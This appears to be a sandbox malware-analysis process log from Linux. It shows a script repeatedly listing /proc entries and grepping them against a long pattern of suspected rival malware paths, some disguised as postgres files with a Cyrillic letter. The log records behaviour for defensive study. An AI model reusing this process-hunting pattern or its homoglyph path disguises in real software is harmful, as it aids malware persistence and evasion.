/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:780
-
-
/bin/grepgrep exe2⤵PID:785
-
-
/bin/lsls -latrh /proc/1852⤵PID:784
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:787
-
-
/bin/lsls -latrh /proc/192⤵PID:790
-
-
/bin/grepgrep exe2⤵PID:791
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:794
-
-
/bin/grepgrep exe2⤵PID:798
-
-
/bin/lsls -latrh /proc/22⤵PID:797
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:801
-
-
/bin/lsls -latrh /proc/202⤵PID:803
-
-
/bin/grepgrep exe2⤵PID:804
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:807
-
-
/bin/lsls -latrh /proc/2052⤵PID:810
-
-
/bin/grepgrep exe2⤵PID:811
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:814
-
-
/bin/grepgrep exe2⤵PID:818
-
-
/bin/lsls -latrh /proc/212⤵PID:817
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:821
-
-
/bin/grepgrep exe2⤵PID:825
-
-
/bin/lsls -latrh /proc/222⤵PID:824
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:828
-
-
/bin/lsls -latrh /proc/232⤵PID:831
-
-
/bin/grepgrep exe2⤵PID:832
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:835
-
-
/bin/grepgrep exe2⤵PID:838
-
-
/bin/lsls -latrh /proc/242⤵PID:837
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:841
-
-
/bin/lsls -latrh /proc/252⤵PID:845
-
-
/bin/grepgrep exe2⤵PID:846
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:849
-
-
/bin/lsls -latrh /proc/262⤵PID:852
-
-
/bin/grepgrep exe2⤵PID:853
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:856
-
-
/bin/lsls -latrh /proc/2612⤵
- Reads runtime system information
PID:860
-
-
/bin/grepgrep exe2⤵PID:861
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:864
-
-
/bin/lsls -latrh /proc/2622⤵PID:867
-
-
/bin/grepgrep exe2⤵PID:868
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:870
-
-
/bin/grepgrep exe2⤵PID:875
-
-
/bin/lsls -latrh /proc/2642⤵PID:874
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:879
-
-
/bin/grepgrep exe2⤵PID:883
-
-
/bin/lsls -latrh /proc/2652⤵PID:882
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:886
-
-
/bin/lsls -latrh /proc/2662⤵PID:889
-
-
/bin/grepgrep exe2⤵PID:890
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:893
-
-
/bin/grepgrep exe2⤵PID:897
-
-
/bin/lsls -latrh /proc/272⤵PID:896
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:900
-
-
/bin/lsls -latrh /proc/282⤵PID:902
-
-
/bin/grepgrep exe2⤵PID:903
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:906
-
-
/bin/lsls -latrh /proc/292⤵PID:908
-
-
/bin/grepgrep exe2⤵PID:909
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:912
-
-
/bin/lsls -latrh /proc/2952⤵PID:914
-
-
/bin/grepgrep exe2⤵PID:915
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:917
-
-
/bin/lsls -latrh /proc/2992⤵PID:919
-
-
/bin/grepgrep exe2⤵PID:920
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:922
-
-
/bin/lsls -latrh /proc/32⤵PID:924
-
-
/bin/grepgrep exe2⤵PID:925
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:927
-
-
/bin/lsls -latrh /proc/3062⤵PID:929
-
-
/bin/grepgrep exe2⤵PID:930
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:932
-
-
/bin/grepgrep exe2⤵PID:935
-
-
/bin/lsls -latrh /proc/3332⤵PID:934
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:937
-
-
/bin/lsls -latrh /proc/42⤵PID:939
-
-
/bin/grepgrep exe2⤵PID:940
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:942
-
-
/bin/grepgrep exe2⤵PID:945
-
-
/bin/lsls -latrh /proc/412⤵PID:944
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:947
-
-
/bin/lsls -latrh /proc/422⤵PID:949
-
-
/bin/grepgrep exe2⤵PID:950
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:952
-
-
/bin/lsls -latrh /proc/432⤵PID:954
-
-
/bin/grepgrep exe2⤵PID:955
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:957
-
-
/bin/grepgrep exe2⤵PID:960
-
-
/bin/lsls -latrh /proc/52⤵PID:959
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:962
-
-
/bin/grepgrep exe2⤵PID:966
-
-
/bin/lsls -latrh /proc/5802⤵PID:965
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:970
-
-
/bin/lsls -latrh /proc/5952⤵PID:973
-
-
/bin/grepgrep exe2⤵PID:974
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:976
-
-
/bin/lsls -latrh /proc/5982⤵PID:979
-
-
/bin/grepgrep exe2⤵PID:980
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:983
-
-
/bin/lsls -latrh /proc/62⤵PID:985
-
-
/bin/grepgrep exe2⤵PID:986
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:990
-
-
/bin/lsls -latrh /proc/6002⤵PID:992
-
-
/bin/grepgrep exe2⤵PID:993
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:996
-
-
/bin/grepgrep exe2⤵PID:1000
-
-
/bin/lsls -latrh /proc/6012⤵PID:999
-
-
